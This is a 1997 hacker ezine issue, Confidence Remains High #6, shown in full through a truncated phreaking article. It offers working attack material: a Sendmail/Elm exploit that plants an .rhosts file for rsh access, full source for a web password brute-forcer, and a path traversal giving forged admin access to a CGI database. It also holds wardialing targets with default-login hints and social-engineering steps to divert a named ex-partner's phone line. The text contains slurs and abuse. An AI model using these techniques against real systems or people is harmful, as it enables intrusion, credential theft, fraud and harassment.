.o. cZo .o. Team CodeZero Presents .o. cZo .o. CYBERJUNKIE IS A FAT LYING GREASY CUNT - Cold-Fire /IIIIIIIIII /IIIIIIIIII /III /III \ III_____/ \ III___/III \ III \ III \ III \ III \ III \ III \_III \ III onfidence \ IIIIIIII emains \ IIIIIIIIII igh \ III \ III__/III \ III__/ III \ III \ III \ III \ III \ III \ IIIIIIIIII ___ \ III \ III ___ \ III \ III ___ \_________/ /\__\ \__/ \__/ /\__\ \__/ \__/ /\__\ \/__/ \/__/ \/__/ Issue 6 12th December 1997 Editor : so1o Pimped falken's flea : tymat The usual : om3n, zer0x, xFli, electro, Spheroid and helix. Not forgotten : loss, organik, d-storm (aka el8) peenut, pzn, suid and manly. Special thanks to : Shok, dlc, efpee, chameleon, daxx falken, figster and cain. Windows : The carparts crew. Kick in the teeth to : TRON and stealth (aka. dev_null) .-----------[ An Official ]-----------. : .-----. .----. .--.--. : : : .--' : .-. : : : : : !_-:: : : : `-' ; : . : ::-_! :~-:: :: : :: . : :: : ::-~: : ::.`--. ::.: : ::.: : : : `-----' `--'--' `--'--' : !_-:: ::-_! :~-::-[ Confidence Remains High ]-::-~: :~-:: ::-~: `-----------[ Production ]------------' We wrote this is 9 days in total, which is reasonably impressive considering the content, we hope you enjoy it, because we won't be putting out much until 1998 :) -- so1o In This Bumper Sized Christmas Issue : ------=> Section A : Introduction And Cover Story. 1. Confidence Remains High issue 6....................: Tetsu Khan 2. Policy.............................................: so1o ------=> Section B : Exploits And Code. 1. EXCLUSIVE CRH SENDMAIL / ELM 2.4 REMOTE EXPLOIT....: figster 2. TraceProbe.sh......................................: falken 3. BruteWeb (SSL) 2.0.................................: BeastMaster V 4. Check.sh...........................................: xFli 5. Selena Sol remote flaw (unpublished)...............: Cain ------=> Section C : Phones / Scanning / Radio. 1. ShokDial...........................................: Shok 2. More MIT dialups...................................: zer0x 3. Hiding within the system...........................: efpee 4. An introduction to LightSpan 2000's................: dlc 5. An introduction to the NEC P3......................: DaXX 6. More Russian dialups...............................: Lirik 7. UK x.25 network numbers............................: Cold-Fire ------=> Section D : Miscellaneous. 1. A short introduction to IPv6.......................: so1o 2. Newbie sk00l.......................................: so1o 3. Windows NT filesharing basics......................: chameleon 4. BitchX / crackrock bug.............................: so1o / Shok 5. Nifty Lynx trick...................................: Electric Nectar 6. No-more negative...................................: so1o ------=> Section E : World News. 1. Pentagon hacked....................................: so1o -------=> Section F : Projects. 1. TOTALCON '98.......................................: so1o ------=> Section G : FIN. =============================================================================== ==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]== =============================================================================== 1. Confidence Remains High issue 6 : Tetsu Khan Welcome to a vastly new and improved Confidence Remains High, now geared to (basically) everyone we could think of, there may be some parts that some of you may dislike and think below you, as well as being some parts you actually learn something from, as always, we hope you enjoy this issue, and those to come in the future.. The distro list.. ================= www.technotronic.com /ezines/crh/ cybrids.simplenet.com /Toast/files/CRH/ ftp.linuxwarez.com /pub/crh/ ftp.sekurity.org /users/so1o/ 2. Policy : so1o In issues 1, 2 and 3, we took our readers through some simple steps of getting some exploits, using them, and reaping the rewards, some, if not most of those exploits that we published were taken from recent posts to BugTraq (at http://www.geek-girl.com/bugtraq) and from websites such as the acclaimed www.rootshell.com, then CRH was aimed soley at those who had read 1980's BBS text files until they were blue in the face and couldn't stand another "UNIX for beginners" file, so we put out this magazine, in an attempt to take the "newbies" who wanted to learn, and give them an oppurtunity to gain up-to date knowledge about the scene and the way things work now, because those who write other magazines really don't gear their articles to those who aren't fully confident with Unix and the ideas and methodologies that are needed to understand exactly whats going on. Since then our readership levels have increased, and more and more of the people who are highly skilled (halflife for one) have made statements about Confidence Remains High being weak and lame, but thats only an opinion, but none the less, we have taken it into account, and tried our best to make this, and issues to come, geared to both newbies and the elite few who care to critisize us.. We don't want to be like Phrack, they get alot of flames themselves, the only reason we write these files is to learn, keep ourselves out of trouble, teach others, and most importantly, to have fun (and become famous, heh j/k).. If you want something a little more simple to understand, then read CRH, if you want something that is only understandable by those who wrote the articles and the few who actually know about the subjects covered, then read Phrack. If you don't understand either Phrack or CRH, then read THTJ which is a weak version of CRH, with vB programs, articles that were previously in CRH, and not forgetting, members of sIn as writers, hahahahoeowehahahahaha! Thank you for listening, so1o =============================================================================== ==[ EXPLOITS / CODE ]==========[ .SECTION B. ]============[ EXPLOITS / CODE ]== =============================================================================== 1. EXCLUSIVE CRH SENDMAIL / ELM 2.4 REMOTE EXPLOIT : figster On a variety of machines running Sendmail, Elm 2.4 will also be used, the hole regards the sun-message.csh which is called by Elm, this in turn will call uudecode which will create a file on the filesystem complete with the file permissions you previously set, then fail gracefully and not inform you that the file had been created, h0h0h0. If you use the 64-bit mime encoding, you can even save the file, look at it, and not see the evil hax0r file that was specified. So far linux and anything running the metamail decoder sun-message.csh are vulnerable.. This is basically what you do... It may not work, don't blame us : ------------------------------------------------------------------ 1) create your evil file (a .rhosts in this case)... % echo "+ +" > /tmp/eatm3 2) next uuencode your "logic bomb"... making the file /tmp/eatme % uuencode /tmp/eatm3 /bin/.rhosts > /tmp/eatme.uue 3) attach the /tmp/eatme.uue to the email to the target so the Content Type is set to "default/text" 4) send your e-mail to the target, eg. bin@target.here.com 5) then attempt to use rsh.. % rsh -l bin target.here.com csh -i If you don't get a shell from using rsh, then the in.rshd may not be running, or the exploit may have failed (most probable cause) This original technique was given to figster, then he wrote up a file, then I made the file easier to understand, it's quite rare for this to actually work, so don't think it will first time :-) 2. TraceProbe.sh : falken #!/bin/sh # # falken@rune.org presents Traceprobe version 1.4 # # basically uses strobe to portscan all the hosts from # a traceroute query, saves me alot of time, thats what it's for.. # # requires stobe in the same directory as well as # access to awk and most importantly traceroute. # /usr/sbin/traceroute $1 > $1.traceroute /bin/cat $1.traceroute | awk '{print $2}' > $1.traceroute.host strobe -i $1.traceroute.host -b $2 -e $3 # cleanup here.. /bin/rm $1.traceroute $1.traceroute.host 3. BruteWeb (SSL) 2.0 : BeastMaster V /* * * Brute Web (SSL) 2.0, BeastMaster V. * September 1997, for Confidence Remains High magazine. * * You will probably need to download the SSL libraries from * ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/ * * To compile (one line) : * * cc -o brute_ssl -I/usr/local/ssl/include brute_ssl.c \ * -L/usr/local/ssl/lib -lssl -lcrypto * * brute_ssl to run, gives usage.. * * Disclaimer : I am not responsible for anything you do with this * tool, so please use it in a responsible manner. * */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include extern int errno, h_errno; #define SPACELEFT(buf,ptr) (sizeof buf-((ptr)-buf)) #define newstr(s) strcpy(malloc(strlen(s)+1),s) #define HTTPD_UNAUTHORIZED 401 #define FL __FILE__,__LINE__ #define MAXDICTWORD 64 #define MAXNAMEPASSLEN 128 #define MAXENCODEDSTRING 256 #define MAXSENDSTRING 300 #define HAS_DICTIONARY 0x0001 #define HAS_USERNAME 0x0002 #define HAS_PORTNUMBER 0x0004 #define HAS_HOSTNAME 0x0008 #define HAS_VERBOSE 0x0010 #define HAS_SSL_OPT 0x0020 #define HAS_REALM 0x0040 #define HAS_DONE_IT 0x0080 #if SSLEAY_VERSION_NUMBER >= 0x0800 #define SSLEAY8 #endif char alphabet[]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; char *prg_nme; int mask; struct BASE64_PARAMS { unsigned long int accum; int shift; int save_shift; }; /* BeastMaster V's error logging function */ void proc_err(char *func,char *file,int line,const char *fmt, ...) { va_list args; if (prg_nme!=NULL) fprintf(stderr,"[%s]", prg_nme); va_start(args, fmt); fprintf(stderr," %s() ",func); fprintf(stderr," : ",file,line); vfprintf(stderr, fmt, args); fputc('\n', stderr); fflush(stderr); va_end(args); } /* an implementation of signal() based on sigaction() */ void (*r_signal(int sig,void(*func)())) (int) { struct sigaction act, oact; act.sa_handler = func; sigemptyset(&act.sa_mask); act.sa_flags = 0; #ifdef SA_RESTART act.sa_flags |= SA_RESTART; #endif if (sigaction(sig, &act, &oact) < 0) return (SIG_ERR); return (oact.sa_handler); } /* function to read into a buffer over and SSL connection */ int SSL_readln(SSL *ssl_con, char *buf, int buf_size) { int i=0,done=0,w; char tmp[1]; *(buf+0)='\0'; while (!done) { if (i==(buf_size-1)) break; w=SSL_read(ssl_con,tmp,1); if (w<0) return -1; if (w==0) return 0; if (tmp[0]!=0) *(buf+i)=tmp[0]; if (*(buf+i)=='\n') done=1; i++; } *(buf+i)='\0'; return(i); } /* read from socket into a buffer until sizeof(buffer) or newline */ int socket_readln(int s,char *buf,short len) { int i=0, w; char tmp[1]; short done=0; while (!done) { if (i==len) break; w=read(s ,tmp, 1); if (w==0) return 0; if (tmp[0] != 0) { *(buf+i) = tmp[0]; } if (tmp[0]=='\n') { done = 1; } i++; } *(buf+i)='\0'; return (i); } /* base64 encode an arbitrary string */ int base64_encode(int quit,struct BASE64_PARAMS *e_p,char *string_to_encode,char *buf_64) { int index; unsigned long int value; unsigned char blivit; int z=0; index = 0; while((*(string_to_encode+z))||(e_p->shift!=0)) { if ((*(string_to_encode+z))&&(quit==0)) { blivit = *(string_to_encode +z); z++; if (*(string_to_encode+z)==0) { quit = 1; e_p->save_shift=e_p->shift; blivit=0; } } else { quit=1; e_p->save_shift=e_p->shift; blivit=0; } if ((quit==0)||(e_p->shift!= 0)) { value=(unsigned long)blivit; e_p->accum <<= 8; e_p->shift += 8; e_p->accum |= value; } while (e_p->shift >= 6) { e_p->shift -= 6; value = (e_p->accum >> e_p->shift) & 0x3Fl; blivit = alphabet[value]; *(buf_64+(index++)) = blivit; if (index >= 60) { *(buf_64+index)='\0'; index = 0; } if ( quit != 0 ) e_p->shift = 0; } } if (e_p->save_shift==2) { *(buf_64+(index++))='='; if (index>=60) { *(buf_64+index)='\0'; index=0; } *(buf_64+(index++))='='; if (index>=60 ) { *(buf_64+index)='\0'; index=0; } } else if (e_p->save_shift==4) { *(buf_64+(index++))='='; if (index>=60) { *(buf_64+index)='\0'; index=0; } } if (index!=0) *(buf_64+index)='\0'; return quit; } /* takes string to encode and a user supplied buffer as parameters */ void encode_string (char *name_pass,char *buf_64) { struct BASE64_PARAMS e_p; int quit=0; register int i; char s[MAXNAMEPASSLEN+3]; e_p.shift = 0; e_p.accum = 0; sprintf(s,"%s%c",name_pass,*(name_pass+strlen(name_pass)-1)); base64_encode(quit, &e_p, s,buf_64); return; } /* check the web server's HTTP response headers */ short check_response (char *response) { short ScanCount; int httpd_code; short version; ScanCount=sscanf(response,"HTTP/1.%d %d",&version,&httpd_code); if (ScanCount!=2) return 0; if (httpd_code==HTTPD_UNAUTHORIZED) return 0; else return 1; } /* reads a line from a file */ short read_line(FILE *fp, char *buf) { int c; short done=0; short i=0; while (!done) { c=fgetc(fp); if (c==EOF) return 0; if (c=='\n') { done=1; break; } if (c) *(buf+i)=c; i++; } *(buf+i)='\0'; return i; } void terminate (int sig) { proc_err("terminate",FL,"[%s] has caught %d (%s)", prg_nme,sig,(sig==SIGINT)?"SIGINT":"SIGSEGV"); exit(EXIT_FAILURE); } /* creates a TCP socket and connects it to a peer */ int make_socket(char *in_host,unsigned short port_num) { int sd, err; struct hostent *hp=NULL; struct sockaddr_in sa; sd=socket(AF_INET, SOCK_STREAM, 0); if (sd==-1) { proc_err("make_socket",FL,"Could not create socket->%s",strerror(errno)); exit(EXIT_FAILURE); } hp=gethostbyname(in_host); if (!hp) { if (h_errno==HOST_NOT_FOUND) proc_err("make_socket",FL,"Could not resolv [%s]->Host not Found",in_host); else proc_err("make_socket",FL,"Cound not resolv [%s]->DNS error",in_host); exit(EXIT_FAILURE); } bzero(&sa,sizeof(sa)); sa.sin_family=hp->h_addrtype; bcopy(hp->h_addr,(char *)&sa.sin_addr,hp->h_length); sa.sin_port=htons(port_num); err=connect(sd, (struct sockaddr *)&sa,sizeof(sa)); if (err==-1) { proc_err("make_socket",FL,"connect() call failed->%s",strerror(errno)); exit(EXIT_FAILURE); } return sd; } /* prints the program usage */ void print_usage() { int x; char messages[][255] = { "\n\t'%s [options]'\n\n", "Options:\n", "\t-v verbose mode (print responses to stdout)\n", "\t-z SSL flag (use this for secure servers)\n", "\t-d dictionary file (full path to dictionary file)\n", "\t-u username (a user on the target webserver)\n", "\t-h hostname (host running the webserver)\n", "\t-p portnumber (port that the webserver runs on)\n", "\t-r realm (the full path to the protected realm)\n\n", "Example:\n", "\tSay everytime I type https://www.somewhere.com/protected\n", "\tinto netscape, a box pops up and asks me to enter in a\n", "\tUser ID and password. Well, I have no idea what User ID\n", "\tor password to enter in, so I'll try to 'guess' my way in.\n", "\tI have a dictionary file in /tmp/dict.txt. Next I'll guess\n", "\ta username of \"foo\". Now I can type a command like:\n", "\n", " %s -z -d /tmp/dict.txt -u foo -h www.somewhere.com -p 443 -r /protected\n", "\n", "\tNow with any luck I'll eventually see a username and password.\n", "\ti.e: ----USERNAME=foo PASSWORD=foopass----\n\n", "\0" }; fprintf(stderr,"\n-- Brute Web (SSL) v2.0 --\n"); for(x=0; *messages[x]!='\0';x++) fprintf(stderr, messages[x], prg_nme); } /* brute_ssl */ int main (unsigned int argc,char **argv, char **envp) { int err=0, sd,in_port=0, try=0; char c, *export_buf=NULL; SSL *ssl_con=NULL; SSL_CTX *ssl_ctx=NULL; unsigned long ssl_err; FILE *dict_fd=NULL; char *dict_name=NULL,*in_host=NULL; char *user=NULL,*realm=NULL, *dict_word=NULL; char *name_pass_buf=NULL, *encoded_buf=NULL; char *p_title=NULL; if ((prg_nme=strrchr(argv[0],'/'))) ++prg_nme; else prg_nme=argv[0]; mask=0; while((c=getopt(argc,argv,"vzd:u:h:p:r:"))!=EOF) { switch(c) { case 'v': mask|=HAS_VERBOSE; break; case 'z': mask|=HAS_SSL_OPT; break; case 'd': dict_name=optarg; mask|=HAS_DICTIONARY; break; case 'u': user=optarg; mask|=HAS_USERNAME; break; case 'h': in_host=optarg; mask|=HAS_HOSTNAME; break; case 'p': in_port=atoi(optarg); if (!in_port) err++; mask|=HAS_PORTNUMBER; break; case 'r': realm=optarg; mask|=HAS_REALM; break; case '?': err++; } } if ((optind%s",strerror(errno)); exit(EXIT_FAILURE); } name_pass_buf=(char *)malloc(MAXNAMEPASSLEN); if (!name_pass_buf) { proc_err("main",FL,"Call to malloc() failed->%s",strerror(errno)); exit(EXIT_FAILURE); } encoded_buf=(char *)malloc(MAXENCODEDSTRING); if (!encoded_buf) { proc_err("main",FL,"Call to malloc() failed->%s",strerror(errno)); exit(EXIT_FAILURE); } export_buf=(char *)malloc(MAXSENDSTRING); if (!export_buf) { proc_err("main",FL,"Call to malloc() failed->%s",strerror(errno)); exit(EXIT_FAILURE); } dict_fd=fopen(dict_name,"r"); if (dict_fd==NULL) { proc_err("main",FL,"Could not open dictionary file->%s",strerror(errno)); exit(EXIT_FAILURE); } if (mask & HAS_SSL_OPT) { SSLeay_add_ssl_algorithms(); SSL_load_error_strings(); ssl_ctx = SSL_CTX_new(SSLv2_client_method()); if (!ssl_ctx) { proc_err("main",FL,"Call to SSL_CTX_new return a NULL"); exit(EXIT_FAILURE); } } while (read_line(dict_fd,dict_word)) { sd=make_socket(in_host,in_port); if (mask & HAS_SSL_OPT) { ssl_con=SSL_new(ssl_ctx); if (!ssl_con) { proc_err("main",FL,"SSL_new() returned NULL."); exit(EXIT_FAILURE); } SSL_set_fd (ssl_con, sd); ssl_err=SSL_connect(ssl_con); if (ssl_err<=0) { ssl_err=ERR_get_error(); proc_err("main",FL,"SSL_connect() failed->%s\n", ERR_error_string(ssl_err,export_buf)); exit(EXIT_FAILURE); } } sprintf(name_pass_buf,"%s:%s",user,dict_word); encode_string(name_pass_buf,encoded_buf); sprintf(export_buf,"GET %s HTTP/1.0\nAuthorization: Basic %s\n\n",realm, encoded_buf); try++; if (mask & HAS_SSL_OPT) { SSL_write(ssl_con,export_buf,strlen(export_buf)); SSL_readln(ssl_con,export_buf,MAXSENDSTRING-1); if (mask & HAS_VERBOSE) fprintf(stdout,"\n==[Pass # %d]============\n%s",try, export_buf); } else { write(sd,export_buf,strlen(export_buf)); socket_readln(sd,export_buf,MAXSENDSTRING-1); if (mask & HAS_VERBOSE) fprintf(stdout,"\n==[Pass # %d]============\n%s",try, export_buf); } if (check_response(export_buf)) { mask |=HAS_DONE_IT; break; } if (mask & HAS_VERBOSE) { if (mask & HAS_SSL_OPT) { while(SSL_readln(ssl_con,export_buf,MAXSENDSTRING-1)) fprintf(stdout,"%s",export_buf); } else { while(socket_readln(sd,export_buf,MAXSENDSTRING-1)) fprintf(stdout,"%s",export_buf); } } close(sd); if (mask & HAS_SSL_OPT) SSL_free(ssl_con); } if (mask & HAS_DONE_IT) fprintf(stdout,"\n\n\t----USERNAME=%s PASSWORD=%s----\n\n",user,dict_word); else fprintf(stdout,"\n\n\t----Sorry, but I could not get in.----\n"); free(dict_word); free(name_pass_buf); free(export_buf); if (mask & HAS_SSL_OPT) SSL_CTX_free(ssl_ctx); } 4. Check.sh : xFli #!/bin/bash # # # - Simple Crontab monitor for keeping tabs on index.html # # - At the moment, if the script finds a change in the filesize of the file # it will copy the bad file to /var/log/.evil and replace it with the # backup, log its actions to /var/log/check.log and inform [mail] of the error. # If the backup itself has the wrong filesize, it will shutdown the # inetd superserver and notify [mail] of the mismatch. You should edit # this to run commands more suitable to your situation. (line 58) # # # - Usage check.sh [original] [backup] [filesize] [mail] # # # - [original] is the FULL PATH to the file you want to guard e.g. /home/http/index.html # - [backup] is the FULL PATH to the backup of the original e.g. /root/backup.html # - [filesize] is the size in bytes of the original, e.g. 39790 # - [mail] is a mail address that the script should send notifications to, e.g. root@localhost # # - If you want to run the check every 5 minutes, add the following line # - to root's crontab: # 0,5,10,15,20,25,30,35,40,45,50,55 * * * * /root/check.sh /home/http/index.html /root/backup.html 37970 root@localhost # # (remembering to change the paths and the filesize) # # # --=[ Cheap and nasty code from xFli, your number 1 discount store ]=-- # # ONCE AGAIN: TAKE THE TIME TO EDIT THIS TO SUIT YOUR NEEDS BETTER # You might want to take out the line that returns the # status of the file even if it is 'OK' , especially # if you are going to run the script a lot like every # 30 seconds... :] # # TIME=`/bin/uname -v` if [ $1x = x ]; then echo "Please read the usuage instructions for this script" else if ls -la $1 | grep $3 1>/dev/null 2>/dev/null ; then echo "$1 OK "$TIME>>/var/log/check.log echo "">>/vat/log/check.log else echo "">>/var/log/check.log echo " - WARNING - file size mismatch on $1 at "$TIME>>/var/log/check.log echo "WARNING : FILESIZE MISMATCH on $1"$TIME | mail $4 mv $1 /var/log/.evil if ls -la $2 | grep $3 1>/dev/null 2>/dev/null ; then cp $2 $1 else echo ""/var/log/check.log echo " - WARNING - Filesize mismatch on BACKUP FILE $2 at "$TIME>>/var/log/check.log echo " - WARNING - Filesize mismatch on $2 at "$TIME | mail $4 echo "Shutting down inetd superserver "$TIME>>/var/log/check.log killall -9 inetd echo "">>/var/log/check.log fi fi fi 5. Selena Sol remote flaw : Cain After many hours of sifting through the source code as part of my job at an ISP, I stumbled onto something. A problem in the midst of the authentication libraries of Selena Sol's Database Manager. In auth-lib.pl at line 192 it reads open (SESSIONFILE, "$auth_session_dir/$session_file") Now this is interesting. Nowhere does it check to make shure you don't have any '/' chars in the $session_file. So we can specify our own session file outside the intended path :) The session file format is: id|group|fname|lname|email always have the group be "admin". This way you get access to the entire database. Let's say this remote system is some wierd warez archive. They want us to upload files. So we make a file called werd.dat: cain|admin|Cain|Bomb|cain@tasam.com Then we FTP this file up to the remote system. Depending on what OS they have, it will either be in /var/ftp/incoming or /home/ftp/incoming or whatever, you figure it out. Now we make our HTML exploit!!! Just create this file and view it using lynx, netscape, or whatever.
All the paths you'll hafta figure out on yer own. Notice theres no ".dat" after the "../../var/ftp/incoming/werd". It does that automaticlly. You may need to change the amount of ../'s dont' worry bout going over board though. It will still work. What exactly happens? Well, db_manager.cgi runs with whatever setup_file you specified. It sees that the session_file variable is declare so instead of going to the login screen, it reads the info from the session file "Session_files/../../var/ftp/incoming/werd.dat" which contains administrator status because the group is "admin". Boom. You're in the database free to modify or delete anything. The reason I found this out was because I found one interesting database I couldn't search through without a valid username and password. So I did this. I wouldn't modify anything because who cares. Cain =============================================================================== ==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]== =============================================================================== 1. ShokDial : Shok Originally written based on an idea by zer0x, and written for public release, this article is NOT property of THTJ, because they are fucking sIn groupies, this was written by Shok, and therefore is intellectual property of that author, so don't even think about it you fucking THTJ fools. --so1o Serial programming for unix.....boy this stuff is fun. Well unix is famous for it's special files. The modem is just a file you can open(), read(), and write() to...for that reason this program can be used on all unixs'. The only thing different that needs to be changed, is the #define MODEMPORT "/dev/cua1", because most unix/unix clones have their own modem port. For example /dev/ttyS? which is COM1 (to the DOS users), would be /dev/ttym? in IRIX. Now once this program opens the modem (via device/special file) for reading/writing, it will write() to it, and send it standard modem instructions like +++ATH, ATZ etc....this comes before any dialing to get the modem ready....we also use a function to check for "OK" so we know that all is well. On receiving this, then enter the number we want to dial into a character buffer, append a "\r" to it (to it actually sends the command), we then write(fd (the file desc. for /dev/cua1), thebufwiththenum, strlen(thebufwiththenum)); Now once you do this..you can't write "+++ATH" to it, because it will send that as the login name (assuming you've connected to a host), so what I did, was I opened the other modem port (there are two, /dev/cua0 and /dev/ttyS0 are essentially the same thing (both COM1 to explain it easier), one is used for dialing out (cua?) and one is used for dialling in and out (ttyS?). So I opened up the other port and used that to send the command to hang up. But all the other stuff isn't complex, they are all C primitive instructions like ScanMin++; which would increse ScanMin by 1, repeat a while loop, and then the next strcat(phonenum, ScanMin); ... would dial the next number......you get the idea. That's about all there really is to say about the technical stuff about it. Oh yeah one thing.....when it connects, it looks for the string "CONNECT" returned from the modem serial file. You won't get this message from faxes as you will only get this message when the connection is complete, so this will only return *** CONNECT *** if it was a modem. It will both output to the screen and logfile *** CONNECT *** to 1-xxx-xxx-xxxx. You can use local or long distance, although international numbers haven't been added at this time (not hard to do just didn't care to add an extra scanf and an extra CountryCode variable ;) About ShokDial (it's temp name for now) --------------------------------------- This supports random scanning (pseudorandom to be honest, heh) and sequential (the range you specified and up) scanning. You can give it a range too but that still does under sequential scanning. To use random scanning use 'shokdial -r', otherwise it will by default use sequential scanning. For the other options type 'shokdial -h'. You want to keep track of the version because I'd almsot guarntee this program is going to continue changing. I need to add some ncurses GUI effects (heh) and a function to resume scanning for those of you who are too lazy to even look at the (by default) wardialer.log and get the last number it dialed (assuming you used sequential scanning) and entering that as the Scan number to begin on! It will output to wardialer.log and on to the screen. If you have BEEP = WANTBEEP in the Makefile, it will beep when it connects to a host. That's about all I really have to say about it. I don't actually use war dialers (really), so I haven't actually tested this (sorry if there are any problems but there shouldn't be)....if you do however find a problem, please let me know! I will fix it and send out a patched version.....you can get all of them from ftp.janova.org or www.janova.org. Enjoy ;) Shok 2. More MIT dialups : zer0x In CRH issue #5 I listed the mit guest terminus dialups, which you could use to telnet from. Here is a different one... 1. MTL Terminal Server ---------------------------------------------------------------------------- Here is a 'private' telnet dialup, no 'guest' access allowed, unlike Terminus. It may go down or have a password added to it if they notice all this extra access. MTL Terminal Server (mtl-ts.lcs.mit.edu) 258-7626 258-7623 ---------------------------------------------------------------------------- 2. I have scanned the mit prefix and here are some of the carries I have found. I'm not sure what this can really be useful for but to maybe know the dialup number if you ever own one of these machines. Or who knows, maybe one of the default logins works for one of these machines, [hint hint ;)] 258-7279 nastasia (os:unix) [nastasia.mit.edu] 258-7934 (os:unix) [unknown host] 258-7238 bozo phone login: (os:unix)[bozo.mit.edu] 258-7780 servi login: (os:unix) [unknown host] 258-7967 mit center for space research (os:unix) [hoku.mit.edu] 258-7936 (os:unix) [host: unknown] 258-7838 (os:vms) [host: unknown] 258-7108 Annex Command Line Interpreter for Annex Reuter 258-7958 (MIT Center For Space Research) (os:unix) [grall.mit.edu] ---------------------------------------------------------------------------- NOTE: ----- Maybe there were a few machines I didn't put down, possibly because they were important to me and I did not feel like disclosing them. Maybe I will place them in later issues, who knows. Scanning colleges is always fun because you find neat stuff. Some machines even have outdial modems attached to them :) A good way to find stuff like that is to find the prefix that a uni puts their machines on and scan scan scan. Also a big company may have plenty of machines sitting there waiting for you to find and own. Some people may think that scanning is a bit outdated but it comes in useful. I suggest you use toneloc if you wish to scan since it is the best dos scanner. For Linux use Shok's scanner (ShokDial), which is in this issue. 3. Hiding within the system : efpee "w1ll i ever g3t caught....." "Guess what !@#$ i figured it out.. i can finally ani sp00f with 32.666.666.666 hz tone," - " unkn0wn person I get sick and tired of people... in general explaining to me how fucking kewl it is to go down to a payfone, and make generous calls with a redbox. I find that shit so annoying.. I know the majority of the people reading this are gonna say.. "y0 3y3 JUST R34D 2600 and 3mm4nu3l t0ught m3 b0ut inb4n signalling 4nd h0w to bu1ld a r3db0x.." - unkn0wn person The main reason anyone ever walked to a payfone in the first place was really to lesson the chance of being "..traced.." Let me tell u dumbfucks.. ani is everywhere so dont think just cause u c4n g0 to a payfone u are not gonna get caught.. oh.. btw.. ST0P BU1LD1NG R3DB0X3Z using pbxz, and k0d0ez!#@%$ is less painless, and doesnt cost u m0ney!@#$ . sektion 1 . Diverting has been around since the days of the Capn' Crunch and h1s fux0ring wh1stle. To bad.. if u even want3d to attempt to d1vert with blueb0xing u end up using 800 direct numberz to countries such as gr33ce. Th1s is all g00d.. but again.. A B1TCH. Cause w3 dont all h4ve blueb0xes.. and n0t everyone has a laptop to carry round with onkels little bluebeep. the only th1ng bout that program that was good was the neeto ascii/ansi art. Anyway.. when u think of diverters wh0 comes to mind? AT&T - = - ani is dr0pped wh3n diverted to through intercept op MCI - = - these are the g00d guyz :P W0RLDC0M - = - p4yf0ne please OCI - = - these stup1d sp1cs have ani n0w :( TELTRUST - = - <----------- th3 supr3m3 in my l1f3 :) Teltrust has nifty little backd00rs that allow u to access operators usually only allowed through dialing 0 on a teltrust serviced. i c4nn0t release th1s t0p s3kr3t enph0.. but its out there.. Op back doors are hard to find but... then again u have all the time in the w0rld. th1s is m33 4nd my teknique... mee ------> operator -----> vmb with 800 dialout ---> meridian -----> at&t ------> 911 b4ckd00r ----> c0pz pull up 0utside so1o's house... eyem gonna take u through my easy st3p plan of h0w to d1vert fr0m home, and seldom get caught.. 1. Oldskewl stealing of service fr0m neighbor 2. C4ll f0rw4rding st1ll 0wns u.. and if u kn0w much bout switches ;) th1s can aid u greatly in diverting.. Setting up your own diverters w1th c4ll f0rwarding is th3 m0st safest sh1t, cept... please divert wh3n owning your local sw1tch... unless its us west.. they d0nt have ani @#!#$!@#$ i swear ( well i w1sh ). h3r3z l33t pr0ceedure f0r adding call forwarding under 1a. RC:CFV:\ add1ti0n of f0rwarding features ORD 1\ sp33d of activation :) 1 = n0w damn it BASE XXXXXXX\ th3 l0cal number u are add1ng features too TO XXXXXXX\ route to where? 801 855 3326 "y0u h4ve r3ached bah" PFX\ s3t pr3f1x 1 if ld dialing.. although i believe 800 is possible ! execute damn it.. my l0cal switch being 1a.. dats all eye deel with.. but... 5e becomes easier d0 to the fact that if u have access to recent change channels on a 5e.. or rcmac sk1lls.. u can easily add forwarding... The 5e rc/vfy is s0 much simpler... its call3d w1nd0ze 5e.. with neet little ascii menus.. If y0u are n0t an rcm4c w1z... The business office werkers are clueless.. i use uswest as my example m0stly d0 to them being my rb0c.. but anywayz. me> dials 18002441111 (servicing for home usage) automated attendant> Enter Area C0DE and 7 digit number me> 3608646226 <--------ex girlfriendz aa> real attendant.... c0uld u please give me seven digit number u are calling about please g1ve it t0 real attendant. me> uh yes 3608646226 ra> h0w can i h3lp u Mr J0hnson. me> w3ll ummm uh me and family are going out of t0wn for a week.. me> i w4z wondering if u c0uld add f0rwarding or f0rward all my calls to me> 8018553326 . . . . . sure th1ng mister j0hnson.. they w1ll then say.. ra> th1s feature will be online by 5:00 tomm0row nite.. me> U SP1C 0F 4n Op U D!dnt ASK f0r Any ID!@#$ bahahahahh 0wned . sektion 2 . voice mail systems have been around for ever... all had oftered the same benefits under systems such as audiotext, audix, asp3n and older systems. these days the p0ssibilites are endless. some of the newer syst3ms.. that unf0rtunately i dont have actual hard copy f0r.. carry newer features... this includes b0x forwarding, pager n0tification, c4ll f0rwarding, and message f0llow mee.. for inst4nce... dial 1800xxxxxxx -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Back to basic vmb hack1ng these new little systems include pr0mpts such as enter box number and password.. this rem0ves the ease and makes it almost impossible to hack. Yes.. search f0r systems u kn0w have outdial capabilities 9999 is still the admin b0x 9999 is still the most common used password Newer systems are adding l0nger k0dez.. and sumtimes only codes but no actual box number. anyway.. h0w can this help u in diverting..? After u have owned vmb with 800 access? well simple really.. it can be used f0r number of things.. dialing att mci and maj0r ld companies f0r ld purposes totally legit of course.. The pager n0tification feature owns me. herez the tekniq call business office.. like in above insert and add call forwarding to a fone or number u kn0w never gets called.. forward it to an0ther number.. have that number forwarded.. at the end of chain .. put your pager number :) n0t like this isnt obvious or anything.. they just c4nt pr0ve nuffin. its neet to listen 1800864BLAH call my pager after bouncing through all these neet forwarded numbers and hitting the u have reached a pagenet serviced pager... please leave numeric message at the tone, and hit star when finished. I just wanna make aware things people have forgotten about.. people spend to worrying bout " the switch, rcmac, nac, scc " and all the nitty gritty of a boc. Think of what can be done without even hassling.. . pbx . u have read billion txt files on pbxs.. i just recommend reading cavaliers. bah hit *9 or dial one of those nifty 800555xxxx pbxs with 2 digit codes.. oh btw.. th0se ones are probably traps for defcon kids. . sektion 3 . my thoughts on tracing... listen.... in our day and age.. it is very easy for u to be traced.. the thing is, cdma, wireless, broadband, cellular communications is aiding us. If u have a modded oki with antitriangulated mods plus b1llion pairs..? WH0 ARE THEY TRACING .. the ani .. is always there ani failures is yes.. likely to 